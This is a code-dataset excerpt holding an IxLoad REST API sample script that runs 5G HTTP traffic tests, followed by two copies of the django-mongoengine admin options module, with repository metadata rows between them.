restObj.enableForceOwnership()
# Optional: Modify the sustain time
#restObj.configTimeline(name='Timeline1', sustainTime=12)
runTestOperationsId = restObj.runTraffic()
restObj.pollStatsAndCheckStatResults(statsDict,
csvFile=saveStatsToCsvFile,
csvFilePrependName=None,
pollStatInterval=2,
exitAfterPollingIteration=None)
testResult = restObj.getTestResults()
restObj.waitForActiveTestToUnconfigure()
restObj.downloadResults(targetPath=saveResultsInPath)
restObj.retrievePortCaptureFileForAssignedPorts(currentDir)
if deleteSession:
restObj.deleteSessionId()
except (IxLoadRestApiException, Exception) as errMsg:
print('\n%s' % traceback.format_exc())
if deleteSession:
restObj.abortActiveTest()
restObj.deleteSessionId()
sys.exit(errMsg)
except KeyboardInterrupt:
print('\nCTRL-C detected.')
if deleteSession:
restObj.abortActiveTest()
restObj.deleteSessionId()
| 36.530055 | 116 | 0.706058 |
import os, sys, time, signal, traceback, platform
currentDir = os.path.abspath(os.path.dirname(__file__))
if platform.system() == 'Windows':
sys.path.insert(0, (currentDir.replace('SampleScripts\\LoadSavedConfigFile', 'Modules')))
else:
sys.path.insert(0, (currentDir.replace('SampleScripts/LoadSavedConfigFile', 'Modules')))
from IxL_RestApi import *
serverOs = 'windows'
ixLoadVersion = '9.10.115.43' ;
deleteSession = True
forceTakePortOwnership = True
apiKey = None
rxfFile = '5G-eLSU_HTTP_UXM_stats.rxf'
if serverOs == 'windows':
apiServerIp = '192.168.129.6'
resultsDir = 'c:\\Results'
rxfFileOnServer = 'C:\\Results\\{}'.format(rxfFile)
# Where to put the downloaded csv results
saveResultsInPath = currentDir
# Do you need to upload your saved config file to the server?
# If not, a saved config must be already in the IxLoad gateway server filesystem.
upLoadFile = True
# On the local host where you are running this script.
# The path to the saved config file. In this example, get it from the current folder.
if platform.system() == 'Linux':
localConfigFileToUpload = '{}/{}'.format(currentDir, rxfFile)
else:
localConfigFileToUpload = '{}\\{}'.format(currentDir, rxfFile)
# The path where you want to download the csv result files to. This is mostly used if using a Linux Gateway server.
# If you're using IxLoad in Windows, SSH must be installed. Otherwise, this variable will be ignored.
scpDestPath = currentDir
# Set to True if you want to save run time stat results to CSV files.
saveStatsToCsvFile = True
apiServerIpPort = 8443 ;# http=8080. https=8443 (https is supported starting 8.50)
licenseServerIp = '192.168.129.6'
# For 5G, the license model must be Perpetual Mode
licenseModel = 'Perpetual Mode'
# To assign ports for testing. Format = (cardId,portId)
# Traffic1@Network1 are activity names.
# To get the Activity names, got to: /ixload/test/activeTest/communityList
communityPortList1 = {
'chassisIp': '192.168.129.15',
'Traffic2@Network1': [(1,1)],
}
communityPortList2 = {
'chassisIp': '192.168.129.15',
'Traffic1@SGi': [(1,2)],
}
# Stat names to display at run time.
# To see how to get the stat names, go to the link below for step-by-step guidance:
# https://www.openixia.com/tutorials?subject=ixLoad/getStatName&page=fromApiBrowserForRestApi.html
#
# What this does:
# Get run time stats and evaluate the stats with an operator and the expected value.
# Due to stats going through ramp up and ramp down, stats will fluctuate.
# Once the stat hits and maintains the expected threshold value, the stat is marked as passed.
#
# If evaluating stats at run time is not what you need, use PollStats() instead shown
# in sample script LoadConfigFile.py
#
# operator options: None, >, <, <=, >=
statsDict = {
'HTTPClient': [{'caption': 'Rx Rate (Kbps)', 'operator': '>', 'expect': 5000000}]
}
#NRstatsDict = {
# 'UESIM-NRLayer1Statistics': [{'caption': "CRC OK TBs - PDSCH", 'operator': '>', 'expect': 1000)}]
#}
try:
restObj = Main(apiServerIp=apiServerIp,
apiServerIpPort=apiServerIpPort,
osPlatform=serverOs,
deleteSession=deleteSession,
pollStatusInterval=1,
apiKey=apiKey,
generateRestLogFile=True)
# sessionId is an opened existing session that you like to connect to instead of starting a new session.
restObj.connect(ixLoadVersion, sessionId=None, timeout=120)
restObj.configLicensePreferences(licenseServerIp=licenseServerIp, licenseModel=licenseModel)
restObj.setResultDir(resultsDir, createTimestampFolder=True)
if upLoadFile == True:
restObj.uploadFile(localConfigFileToUpload, rxfFileOnServer)
restObj.loadConfigFile(rxfFileOnServer)
restObj.assignChassisAndPorts([communityPortList1, communityPortList2])
if forceTakePortOwnership:
restObj.enableForceOwnership()
# Optional: Modify the sustain time
#restObj.configTimeline(name='Timeline1', sustainTime=12)
runTestOperationsId = restObj.runTraffic()
restObj.pollStatsAndCheckStatResults(statsDict,
csvFile=saveStatsToCsvFile,
csvFilePrependName=None,
pollStatInterval=2,
exitAfterPollingIteration=None)
testResult = restObj.getTestResults()
restObj.waitForActiveTestToUnconfigure()
restObj.downloadResults(targetPath=saveResultsInPath)
restObj.retrievePortCaptureFileForAssignedPorts(currentDir)
if deleteSession:
restObj.deleteSessionId()
except (IxLoadRestApiException, Exception) as errMsg:
print('\n%s' % traceback.format_exc())
if deleteSession:
restObj.abortActiveTest()
restObj.deleteSessionId()
sys.exit(errMsg)
except KeyboardInterrupt:
print('\nCTRL-C detected.')
if deleteSession:
restObj.abortActiveTest()
restObj.deleteSessionId()
| true | true |
f7231bd8d0e0d5858827428b813f77eb1621f255 | 24,092 | py | Python | django_mongoengine/mongo_admin/options.py | Betalos/django-mongoengine | 99a7a2cfc142bfb74f7bed23161e97cffc2c0205 | [
"BSD-3-Clause"
] | null | null | null | django_mongoengine/mongo_admin/options.py | Betalos/django-mongoengine | 99a7a2cfc142bfb74f7bed23161e97cffc2c0205 | [
"BSD-3-Clause"
] | null | null | null | django_mongoengine/mongo_admin/options.py | Betalos/django-mongoengine | 99a7a2cfc142bfb74f7bed23161e97cffc2c0205 | [
"BSD-3-Clause"
] | null | null | null | import operator
from functools import reduce, partial
from django import forms
from django.forms.formsets import all_valid
from django.urls import reverse
from django.contrib.admin.exceptions import DisallowedModelAdminToField
from django.contrib.admin import widgets, helpers
from django.contrib.admin.utils import (
unquote, flatten_fieldsets, get_deleted_objects,
)
from django.contrib.admin.options import (
TO_FIELD_VAR, IS_POPUP_VAR,
get_ul_class, csrf_protect_m,
)
from django.utils.html import escape
from django.core.exceptions import PermissionDenied
try:
from django.db.models.related import RelatedObject
except ImportError:
from django.db.models.fields.related import ForeignObjectRel as RelatedObject # noqa
from django.http import Http404
from django.template.response import TemplateResponse
from django.utils.functional import curry
from django.utils.text import capfirst
from django.utils.translation import gettext as _
from django.forms.forms import pretty_name
from django.forms.models import modelform_defines_fields
from django.conf import settings
from django.apps import apps
from mongoengine import Q
from django_mongoengine.utils import force_text
from django_mongoengine.fields import (ListField, EmbeddedDocumentField,
ReferenceField, StringField)
from django_mongoengine.mongo_admin.util import RelationWrapper
from django_mongoengine.utils.wrappers import copy_class
from django_mongoengine.utils.monkey import get_patched_django_module
from django_mongoengine.forms.documents import (
DocumentForm, documentform_factory, documentformset_factory,
inlineformset_factory, BaseInlineDocumentFormSet)
def get_content_type_for_model(obj):
return apps.get_model("contenttypes.ContentType")()
djmod = get_patched_django_module(
"django.contrib.admin.options",
get_content_type_for_model=get_content_type_for_model,
)
class BaseDocumentAdmin(djmod.ModelAdmin):
"""Functionality common to both ModelAdmin and InlineAdmin."""
form = DocumentForm
def formfield_for_dbfield(self, db_field, **kwargs):
"""
Hook for specifying the form Field instance for a given database Field
instance.
If kwargs are given, they're passed to the form Field's constructor.
"""
request = kwargs.pop("request", None)
# If the field specifies choices, we don't need to look for special
# admin widgets - we just need to use a select widget of some kind.
if db_field.choices is not None:
return self.formfield_for_choice_field(db_field, request, **kwargs)
if isinstance(db_field, ListField) and isinstance(db_field.field, ReferenceField):
return self.formfield_for_manytomany(db_field, request, **kwargs)
# handle RelatedFields
if isinstance(db_field, ReferenceField):
# For non-raw_id fields, wrap the widget with a wrapper that adds
# extra HTML -- the "add other" interface -- to the end of the
# rendered output. formfield can be None if it came from a
# OneToOneField with parent_link=True or a M2M intermediary.
form_field = db_field.formfield(**kwargs)
if db_field.name not in self.raw_id_fields:
related_modeladmin = self.admin_site._registry.get(db_field.document_type)
can_add_related = bool(related_modeladmin and
related_modeladmin.has_add_permission(request))
form_field.widget = widgets.RelatedFieldWidgetWrapper(
form_field.widget, RelationWrapper(db_field.document_type), self.admin_site,
can_add_related=can_add_related)
return form_field
if isinstance(db_field, StringField):
if db_field.max_length is None:
kwargs = dict({'widget': widgets.AdminTextareaWidget}, **kwargs)
else:
kwargs = dict({'widget': widgets.AdminTextInputWidget}, **kwargs)
return db_field.formfield(**kwargs)
# If we've got overrides for the formfield defined, use 'em. **kwargs
# passed to formfield_for_dbfield override the defaults.
for klass in db_field.__class__.mro():
if klass in self.formfield_overrides:
kwargs = dict(self.formfield_overrides[klass], **kwargs)
return db_field.formfield(**kwargs)
# For any other type of field, just call its formfield() method.
return db_field.formfield(**kwargs)
def formfield_for_choice_field(self, db_field, request=None, **kwargs):
"""
Get a form Field for a database Field that has declared choices.
"""
# If the field is named as a radio_field, use a RadioSelect
if db_field.name in self.radio_fields:
# Avoid stomping on custom widget/choices arguments.
if 'widget' not in kwargs:
kwargs['widget'] = widgets.AdminRadioSelect(attrs={
'class': get_ul_class(self.radio_fields[db_field.name]),
})
if 'choices' not in kwargs:
kwargs['choices'] = db_field.get_choices(
include_blank = db_field.blank,
blank_choice=[('', _('None'))]
)
return db_field.formfield(**kwargs)
def formfield_for_manytomany(self, db_field, request=None, **kwargs):
"""
Get a form Field for a ManyToManyField.
"""
db = kwargs.get('using')
if db_field.name in self.raw_id_fields:
kwargs['widget'] = widgets.ManyToManyRawIdWidget(db_field.rel, using=db)
kwargs['help_text'] = ''
elif db_field.name in (list(self.filter_vertical) + list(self.filter_horizontal)):
kwargs['widget'] = widgets.FilteredSelectMultiple(pretty_name(db_field.name), (db_field.name in self.filter_vertical))
return db_field.formfield(**kwargs)
def get_view_on_site_url(self, obj=None):
if obj is None or not self.view_on_site:
return None
if callable(self.view_on_site):
return self.view_on_site(obj)
elif self.view_on_site and hasattr(obj, 'get_absolute_url'):
# use the ContentType lookup if view_on_site is True
return reverse('admin:view_on_site', kwargs={
'content_type_id': 0,
'object_id': obj.pk
})
@copy_class(djmod.ModelAdmin)
class DocumentAdmin(BaseDocumentAdmin):
"Encapsulates all admin options and functionality for a given model."
def __init__(self, model, admin_site):
self.model = model
self.opts = model._meta
self.admin_site = admin_site
super(DocumentAdmin, self).__init__(model, admin_site)
self.log = not settings.DATABASES.get('default', {}).get(
'ENGINE', 'django.db.backends.dummy'
).endswith('dummy')
self.change_list_template = 'admin/change_document_list.html'
# XXX: add inline init somewhere
def _get_inline_instances(self):
for f in self.model._fields.items():
if not (isinstance(f, ListField) and isinstance(getattr(f, 'field', None), EmbeddedDocumentField)) and not isinstance(f, EmbeddedDocumentField):
continue
# Should only reach here if there is an embedded document...
if f.name in self.exclude:
continue
document = self.model()
if hasattr(f, 'field') and f.field is not None:
embedded_document = f.field.document_type
elif hasattr(f, 'document_type'):
embedded_document = f.document_type
else:
# For some reason we found an embedded field were either
# the field attribute or the field's document type is None.
# This shouldn't happen, but apparently does happen:
# https://github.com/jschrewe/django-mongoadmin/issues/4
# The solution for now is to ignore that field entirely.
continue
inline_admin = EmbeddedStackedDocumentAdmin
# check if there is an admin for the embedded document in
# self.inlines. If there is, use this, else use default.
for inline_class in self.inlines:
if inline_class.document == embedded_document:
inline_admin = inline_class
inline_instance = inline_admin(f, document, self.admin_site)
# if f is an EmbeddedDocumentField set the maximum allowed form instances to one
if isinstance(f, EmbeddedDocumentField):
inline_instance.max_num = 1
# exclude field from normal form
if f.name not in self.exclude:
self.exclude.append(f.name)
if f.name == 'created_at' and f.name not in self.exclude:
self.exclude.append(f.name)
self.inline_instances.append(inline_instance)
def get_changelist_form(self, request, **kwargs):
"""
Returns a Form class for use in the Formset on the changelist page.
"""
defaults = {
"formfield_callback": partial(self.formfield_for_dbfield, request=request),
}
defaults.update(kwargs)
if defaults.get('fields') is None and not modelform_defines_fields(defaults.get('form')):
defaults['fields'] = forms.ALL_FIELDS
return documentform_factory(self.model, **defaults)
def get_changelist_formset(self, request, **kwargs):
"""
Returns a FormSet class for use on the changelist page if list_editable
is used.
"""
defaults = {
"formfield_callback": partial(self.formfield_for_dbfield, request=request),
}
defaults.update(kwargs)
return documentformset_factory(
self.model, self.get_changelist_form(request), extra=0,
fields=self.list_editable, **defaults
)
def get_changelist(self, request, **kwargs):
"""
Returns the ChangeList class for use on the changelist page.
"""
from django_mongoengine.mongo_admin.views import DocumentChangeList
return DocumentChangeList
def log_addition(self, request, object, message):
"""
Log that an object has been successfully added.
The default implementation creates an admin LogEntry object.
"""
if not self.log:
return
super(DocumentAdmin, self).log_addition(request, object, message)
def log_change(self, request, object, message):
"""
Log that an object has been successfully changed.
The default implementation creates an admin LogEntry object.
"""
if not self.log:
return
super(DocumentAdmin, self).log_change(request, object, message)
def log_deletion(self, request, object, object_repr):
"""
Log that an object will be deleted. Note that this method is called
before the deletion.
The default implementation creates an admin LogEntry object.
"""
if not self.log:
return
super(DocumentAdmin, self).log_deletion(request, object, object_repr)
@property
def media(self):
return djmod.ModelAdmin.media.fget(self)
@csrf_protect_m
def changeform_view(self, request, object_id=None, form_url='', extra_context=None):
to_field = request.POST.get(TO_FIELD_VAR, request.GET.get(TO_FIELD_VAR))
if to_field and not self.to_field_allowed(request, to_field):
raise DisallowedModelAdminToField("The field %s cannot be referenced." % to_field)
model = self.model
opts = model._meta
if request.method == 'POST' and '_saveasnew' in request.POST:
object_id = None
add = object_id is None
if add:
if not self.has_add_permission(request):
raise PermissionDenied
obj = None
else:
obj = self.get_object(request, unquote(object_id), to_field)
if not self.has_change_permission(request, obj):
raise PermissionDenied
if obj is None:
raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {
'name': force_text(opts.verbose_name), 'key': escape(object_id)})
ModelForm = self.get_form(request, obj)
if request.method == 'POST':
form = ModelForm(request.POST, request.FILES, instance=obj)
if form.is_valid():
form_validated = True
new_object = self.save_form(request, form, change=not add)
else:
form_validated = False
new_object = form.instance
formsets, inline_instances = self._create_formsets(request, new_object, change=not add)
if all_valid(formsets) and form_validated:
self.save_model(request, new_object, form, not add)
self.save_related(request, form, formsets, not add)
change_message = self.construct_change_message(request, form, formsets, add)
if add:
self.log_addition(request, new_object, change_message)
return self.response_add(request, new_object)
else:
self.log_change(request, new_object, change_message)
return self.response_change(request, new_object)
else:
form_validated = False
else:
if add:
initial = self.get_changeform_initial_data(request)
form = ModelForm(initial=initial)
formsets, inline_instances = self._create_formsets(request, form.instance, change=False)
else:
form = ModelForm(instance=obj)
formsets, inline_instances = self._create_formsets(request, obj, change=True)
adminForm = helpers.AdminForm(
form,
list(self.get_fieldsets(request, obj)),
self.get_prepopulated_fields(request, obj),
self.get_readonly_fields(request, obj),
model_admin=self)
media = self.media + adminForm.media
inline_formsets = self.get_inline_formsets(request, formsets, inline_instances, obj)
for inline_formset in inline_formsets:
media = media + inline_formset.media
context = dict(self.admin_site.each_context(request),
title=(_('Add %s') if add else _('Change %s')) % force_text(opts.verbose_name),
adminform=adminForm,
object_id=object_id,
original=obj,
is_popup=(IS_POPUP_VAR in request.POST or
IS_POPUP_VAR in request.GET),
to_field=to_field,
media=media,
inline_admin_formsets=inline_formsets,
errors=helpers.AdminErrorList(form, formsets),
preserved_filters=self.get_preserved_filters(request),
)
# Hide the "Save" and "Save and continue" buttons if "Save as New" was
# previously chosen to prevent the interface from getting confusing.
if request.method == 'POST' and not form_validated and "_saveasnew" in request.POST:
context['show_save'] = False
context['show_save_and_continue'] = False
# Use the change template instead of the add template.
add = False
context.update(extra_context or {})
return self.render_change_form(request, context, add=add, change=not add, obj=obj, form_url=form_url)
@csrf_protect_m
def delete_view(self, request, object_id, extra_context=None):
"The 'delete' admin view for this model."
opts = self.model._meta
app_label = opts.app_label
to_field = request.POST.get(TO_FIELD_VAR, request.GET.get(TO_FIELD_VAR))
if to_field and not self.to_field_allowed(request, to_field):
raise DisallowedModelAdminToField("The field %s cannot be referenced." % to_field)
obj = self.get_object(request, unquote(object_id), to_field)
if not self.has_delete_permission(request, obj):
raise PermissionDenied
if obj is None:
raise Http404(
_('%(name)s object with primary key %(key)r does not exist.') %
{'name': force_text(opts.verbose_name), 'key': escape(object_id)}
)
from django.db import router
using = router.db_for_write(self.model)
# Populate deleted_objects, a data structure of all related objects that
# will also be deleted.
(deleted_objects, model_count, perms_needed, protected) = get_deleted_objects(
[obj], opts, request.user, self.admin_site, using)
if request.POST: # The user has already confirmed the deletion.
if perms_needed:
raise PermissionDenied
obj_display = force_text(obj)
attr = str(to_field) if to_field else opts.pk.attname
obj_id = obj.serializable_value(attr)
self.log_deletion(request, obj, obj_display)
self.delete_model(request, obj)
return self.response_delete(request, obj_display, obj_id)
object_name = force_text(opts.verbose_name)
if perms_needed or protected:
title = _("Cannot delete %(name)s") % {"name": object_name}
else:
title = _("Are you sure?")
context = dict(
self.admin_site.each_context(request),
title=title,
object_name=object_name,
object=obj,
deleted_objects=deleted_objects,
model_count=dict(model_count).items(),
perms_lacking=perms_needed,
protected=protected,
opts=opts,
app_label=app_label,
preserved_filters=self.get_preserved_filters(request),
is_popup=(IS_POPUP_VAR in request.POST or
IS_POPUP_VAR in request.GET),
to_field=to_field,
)
context.update(extra_context or {})
return self.render_delete_form(request, context)
def history_view(self, request, object_id, extra_context=None):
"The 'history' admin view for this model."
from django.contrib.admin.models import LogEntry
# First check if the user can see this history.
model = self.model
obj = self.get_object(request, unquote(object_id))
if obj is None:
raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {
'name': force_text(model._meta.verbose_name),
'key': escape(object_id),
})
if not self.has_change_permission(request, obj):
raise PermissionDenied
# Then get the history for this object.
opts = model._meta
app_label = opts.app_label
action_list = LogEntry.objects.filter(
object_id=unquote(object_id),
content_type=get_content_type_for_model(model)
).select_related().order_by('action_time')
context = dict(
self.admin_site.each_context(request),
title=_('Change history: %s') % force_text(obj),
action_list=action_list,
module_name=capfirst(force_text(opts.verbose_name_plural)),
object=obj,
opts=opts,
preserved_filters=self.get_preserved_filters(request),
)
context.update(extra_context or {})
request.current_app = self.admin_site.name
return TemplateResponse(request, self.object_history_template or [
"admin/%s/%s/object_history.html" % (app_label, opts.model_name),
"admin/%s/object_history.html" % app_label,
"admin/object_history.html"
], context)
class InlineDocumentAdmin(BaseDocumentAdmin):
"""
Options for inline editing of ``model`` instances.
Provide ``name`` to specify the attribute name of the ``ForeignKey`` from
``model`` to its parent. This is required if ``model`` has more than one
``ForeignKey`` to its parent.
"""
document = None
fk_name = None
formset = BaseInlineDocumentFormSet
extra = 1
max_num = None
template = None
verbose_name = None
verbose_name_plural = None
can_delete = True
def __init__(self, parent_document, admin_site):
self.admin_site = admin_site
self.parent_document = parent_document
self.opts = self.model._meta
super(InlineDocumentAdmin, self).__init__()
if self.verbose_name is None:
self.verbose_name = self.model._meta.verbose_name
if self.verbose_name_plural is None:
self.verbose_name_plural = self.model._meta.verbose_name_plural
media = djmod.ModelAdmin.media
def get_formset(self, request, obj=None, **kwargs):
"""Returns a BaseInlineFormSet class for use in admin add/change views."""
if self.declared_fieldsets:
fields = flatten_fieldsets(self.declared_fieldsets)
else:
fields = None
if self.exclude is None:
exclude = []
else:
exclude = list(self.exclude)
exclude.extend(kwargs.get("exclude", []))
exclude.extend(self.get_readonly_fields(request, obj))
# if exclude is an empty list we use None, since that's the actual
# default
exclude = exclude or None
defaults = {
"form": self.form,
"formset": self.formset,
"fields": fields,
"exclude": exclude,
"formfield_callback": curry(self.formfield_for_dbfield, request=request),
"extra": self.extra,
"max_num": self.max_num,
"can_delete": self.can_delete,
}
defaults.update(kwargs)
return inlineformset_factory(self.model, **defaults)
def get_fieldsets(self, request, obj=None):
if self.declared_fieldsets:
return self.declared_fieldsets
form = self.get_formset(request).form
fields = form.base_fields.keys() + list(self.get_readonly_fields(request, obj))
return [(None, {'fields': fields})]
class EmbeddedDocumentAdmin(InlineDocumentAdmin):
def __init__(self, field, parent_document, admin_site):
if hasattr(field, 'field'):
self.model = field.field.document_type
else:
self.model = field.document_type
self.doc_list = getattr(parent_document, field.name)
self.field = field
if not isinstance(self.doc_list, list):
self.doc_list = []
self.rel_name = field.name
if self.verbose_name is None:
self.verbose_name = "Field: %s (Document: %s)" % (capfirst(field.name), self.model._meta.verbose_name)
if self.verbose_name_plural is None:
self.verbose_name_plural = "Field: %s (Document: %s)" % (capfirst(field.name), self.model._meta.verbose_name_plural)
super(EmbeddedDocumentAdmin, self).__init__(parent_document, admin_site)
def queryset(self, request):
if isinstance(self.field, ListField): # list field
self.doc_list = getattr(self.parent_document, self.rel_name)
else: # embedded field
emb_doc = getattr(self.parent_document, self.rel_name)
if emb_doc is None:
self.doc_list = []
else:
self.doc_list = [emb_doc]
return self.doc_list
class StackedDocumentInline(InlineDocumentAdmin):
template = 'admin/edit_inline/stacked.html'
class EmbeddedStackedDocumentAdmin(EmbeddedDocumentAdmin):
template = 'admin/edit_inline/stacked.html'
class TabularDocumentInline(InlineDocumentAdmin):
template = 'admin/edit_inline/tabular.html'
| 40.972789 | 156 | 0.638677 | import operator
from functools import reduce, partial
from django import forms
from django.forms.formsets import all_valid
from django.urls import reverse
from django.contrib.admin.exceptions import DisallowedModelAdminToField
from django.contrib.admin import widgets, helpers
from django.contrib.admin.utils import (
unquote, flatten_fieldsets, get_deleted_objects,
)
from django.contrib.admin.options import (
TO_FIELD_VAR, IS_POPUP_VAR,
get_ul_class, csrf_protect_m,
)
from django.utils.html import escape
from django.core.exceptions import PermissionDenied
try:
from django.db.models.related import RelatedObject
except ImportError:
from django.db.models.fields.related import ForeignObjectRel as RelatedObject
from django.http import Http404
from django.template.response import TemplateResponse
from django.utils.functional import curry
from django.utils.text import capfirst
from django.utils.translation import gettext as _
from django.forms.forms import pretty_name
from django.forms.models import modelform_defines_fields
from django.conf import settings
from django.apps import apps
from mongoengine import Q
from django_mongoengine.utils import force_text
from django_mongoengine.fields import (ListField, EmbeddedDocumentField,
ReferenceField, StringField)
from django_mongoengine.mongo_admin.util import RelationWrapper
from django_mongoengine.utils.wrappers import copy_class
from django_mongoengine.utils.monkey import get_patched_django_module
from django_mongoengine.forms.documents import (
DocumentForm, documentform_factory, documentformset_factory,
inlineformset_factory, BaseInlineDocumentFormSet)
def get_content_type_for_model(obj):
return apps.get_model("contenttypes.ContentType")()
djmod = get_patched_django_module(
"django.contrib.admin.options",
get_content_type_for_model=get_content_type_for_model,
)
class BaseDocumentAdmin(djmod.ModelAdmin):
form = DocumentForm
def formfield_for_dbfield(self, db_field, **kwargs):
request = kwargs.pop("request", None)
# admin widgets - we just need to use a select widget of some kind.
if db_field.choices is not None:
return self.formfield_for_choice_field(db_field, request, **kwargs)
if isinstance(db_field, ListField) and isinstance(db_field.field, ReferenceField):
return self.formfield_for_manytomany(db_field, request, **kwargs)
# handle RelatedFields
if isinstance(db_field, ReferenceField):
# For non-raw_id fields, wrap the widget with a wrapper that adds
# extra HTML -- the "add other" interface -- to the end of the
# rendered output. formfield can be None if it came from a
# OneToOneField with parent_link=True or a M2M intermediary.
form_field = db_field.formfield(**kwargs)
if db_field.name not in self.raw_id_fields:
related_modeladmin = self.admin_site._registry.get(db_field.document_type)
can_add_related = bool(related_modeladmin and
related_modeladmin.has_add_permission(request))
form_field.widget = widgets.RelatedFieldWidgetWrapper(
form_field.widget, RelationWrapper(db_field.document_type), self.admin_site,
can_add_related=can_add_related)
return form_field
if isinstance(db_field, StringField):
if db_field.max_length is None:
kwargs = dict({'widget': widgets.AdminTextareaWidget}, **kwargs)
else:
kwargs = dict({'widget': widgets.AdminTextInputWidget}, **kwargs)
return db_field.formfield(**kwargs)
# If we've got overrides for the formfield defined, use 'em. **kwargs
# passed to formfield_for_dbfield override the defaults.
for klass in db_field.__class__.mro():
if klass in self.formfield_overrides:
kwargs = dict(self.formfield_overrides[klass], **kwargs)
return db_field.formfield(**kwargs)
# For any other type of field, just call its formfield() method.
return db_field.formfield(**kwargs)
def formfield_for_choice_field(self, db_field, request=None, **kwargs):
# If the field is named as a radio_field, use a RadioSelect
if db_field.name in self.radio_fields:
# Avoid stomping on custom widget/choices arguments.
if 'widget' not in kwargs:
kwargs['widget'] = widgets.AdminRadioSelect(attrs={
'class': get_ul_class(self.radio_fields[db_field.name]),
})
if 'choices' not in kwargs:
kwargs['choices'] = db_field.get_choices(
include_blank = db_field.blank,
blank_choice=[('', _('None'))]
)
return db_field.formfield(**kwargs)
def formfield_for_manytomany(self, db_field, request=None, **kwargs):
db = kwargs.get('using')
if db_field.name in self.raw_id_fields:
kwargs['widget'] = widgets.ManyToManyRawIdWidget(db_field.rel, using=db)
kwargs['help_text'] = ''
elif db_field.name in (list(self.filter_vertical) + list(self.filter_horizontal)):
kwargs['widget'] = widgets.FilteredSelectMultiple(pretty_name(db_field.name), (db_field.name in self.filter_vertical))
return db_field.formfield(**kwargs)
def get_view_on_site_url(self, obj=None):
if obj is None or not self.view_on_site:
return None
if callable(self.view_on_site):
return self.view_on_site(obj)
elif self.view_on_site and hasattr(obj, 'get_absolute_url'):
# use the ContentType lookup if view_on_site is True
return reverse('admin:view_on_site', kwargs={
'content_type_id': 0,
'object_id': obj.pk
})
@copy_class(djmod.ModelAdmin)
class DocumentAdmin(BaseDocumentAdmin):
def __init__(self, model, admin_site):
self.model = model
self.opts = model._meta
self.admin_site = admin_site
super(DocumentAdmin, self).__init__(model, admin_site)
self.log = not settings.DATABASES.get('default', {}).get(
'ENGINE', 'django.db.backends.dummy'
).endswith('dummy')
self.change_list_template = 'admin/change_document_list.html'
# XXX: add inline init somewhere
def _get_inline_instances(self):
for f in self.model._fields.items():
if not (isinstance(f, ListField) and isinstance(getattr(f, 'field', None), EmbeddedDocumentField)) and not isinstance(f, EmbeddedDocumentField):
continue
# Should only reach here if there is an embedded document...
if f.name in self.exclude:
continue
document = self.model()
if hasattr(f, 'field') and f.field is not None:
embedded_document = f.field.document_type
elif hasattr(f, 'document_type'):
embedded_document = f.document_type
else:
# For some reason we found an embedded field were either
# the field attribute or the field's document type is None.
# https://github.com/jschrewe/django-mongoadmin/issues/4
# The solution for now is to ignore that field entirely.
continue
inline_admin = EmbeddedStackedDocumentAdmin
# check if there is an admin for the embedded document in
# self.inlines. If there is, use this, else use default.
for inline_class in self.inlines:
if inline_class.document == embedded_document:
inline_admin = inline_class
inline_instance = inline_admin(f, document, self.admin_site)
# if f is an EmbeddedDocumentField set the maximum allowed form instances to one
if isinstance(f, EmbeddedDocumentField):
inline_instance.max_num = 1
# exclude field from normal form
if f.name not in self.exclude:
self.exclude.append(f.name)
if f.name == 'created_at' and f.name not in self.exclude:
self.exclude.append(f.name)
self.inline_instances.append(inline_instance)
def get_changelist_form(self, request, **kwargs):
defaults = {
"formfield_callback": partial(self.formfield_for_dbfield, request=request),
}
defaults.update(kwargs)
if defaults.get('fields') is None and not modelform_defines_fields(defaults.get('form')):
defaults['fields'] = forms.ALL_FIELDS
return documentform_factory(self.model, **defaults)
def get_changelist_formset(self, request, **kwargs):
defaults = {
"formfield_callback": partial(self.formfield_for_dbfield, request=request),
}
defaults.update(kwargs)
return documentformset_factory(
self.model, self.get_changelist_form(request), extra=0,
fields=self.list_editable, **defaults
)
def get_changelist(self, request, **kwargs):
from django_mongoengine.mongo_admin.views import DocumentChangeList
return DocumentChangeList
def log_addition(self, request, object, message):
if not self.log:
return
super(DocumentAdmin, self).log_addition(request, object, message)
def log_change(self, request, object, message):
if not self.log:
return
super(DocumentAdmin, self).log_change(request, object, message)
def log_deletion(self, request, object, object_repr):
if not self.log:
return
super(DocumentAdmin, self).log_deletion(request, object, object_repr)
@property
def media(self):
return djmod.ModelAdmin.media.fget(self)
@csrf_protect_m
def changeform_view(self, request, object_id=None, form_url='', extra_context=None):
to_field = request.POST.get(TO_FIELD_VAR, request.GET.get(TO_FIELD_VAR))
if to_field and not self.to_field_allowed(request, to_field):
raise DisallowedModelAdminToField("The field %s cannot be referenced." % to_field)
model = self.model
opts = model._meta
if request.method == 'POST' and '_saveasnew' in request.POST:
object_id = None
add = object_id is None
if add:
if not self.has_add_permission(request):
raise PermissionDenied
obj = None
else:
obj = self.get_object(request, unquote(object_id), to_field)
if not self.has_change_permission(request, obj):
raise PermissionDenied
if obj is None:
raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {
'name': force_text(opts.verbose_name), 'key': escape(object_id)})
ModelForm = self.get_form(request, obj)
if request.method == 'POST':
form = ModelForm(request.POST, request.FILES, instance=obj)
if form.is_valid():
form_validated = True
new_object = self.save_form(request, form, change=not add)
else:
form_validated = False
new_object = form.instance
formsets, inline_instances = self._create_formsets(request, new_object, change=not add)
if all_valid(formsets) and form_validated:
self.save_model(request, new_object, form, not add)
self.save_related(request, form, formsets, not add)
change_message = self.construct_change_message(request, form, formsets, add)
if add:
self.log_addition(request, new_object, change_message)
return self.response_add(request, new_object)
else:
self.log_change(request, new_object, change_message)
return self.response_change(request, new_object)
else:
form_validated = False
else:
if add:
initial = self.get_changeform_initial_data(request)
form = ModelForm(initial=initial)
formsets, inline_instances = self._create_formsets(request, form.instance, change=False)
else:
form = ModelForm(instance=obj)
formsets, inline_instances = self._create_formsets(request, obj, change=True)
adminForm = helpers.AdminForm(
form,
list(self.get_fieldsets(request, obj)),
self.get_prepopulated_fields(request, obj),
self.get_readonly_fields(request, obj),
model_admin=self)
media = self.media + adminForm.media
inline_formsets = self.get_inline_formsets(request, formsets, inline_instances, obj)
for inline_formset in inline_formsets:
media = media + inline_formset.media
context = dict(self.admin_site.each_context(request),
title=(_('Add %s') if add else _('Change %s')) % force_text(opts.verbose_name),
adminform=adminForm,
object_id=object_id,
original=obj,
is_popup=(IS_POPUP_VAR in request.POST or
IS_POPUP_VAR in request.GET),
to_field=to_field,
media=media,
inline_admin_formsets=inline_formsets,
errors=helpers.AdminErrorList(form, formsets),
preserved_filters=self.get_preserved_filters(request),
)
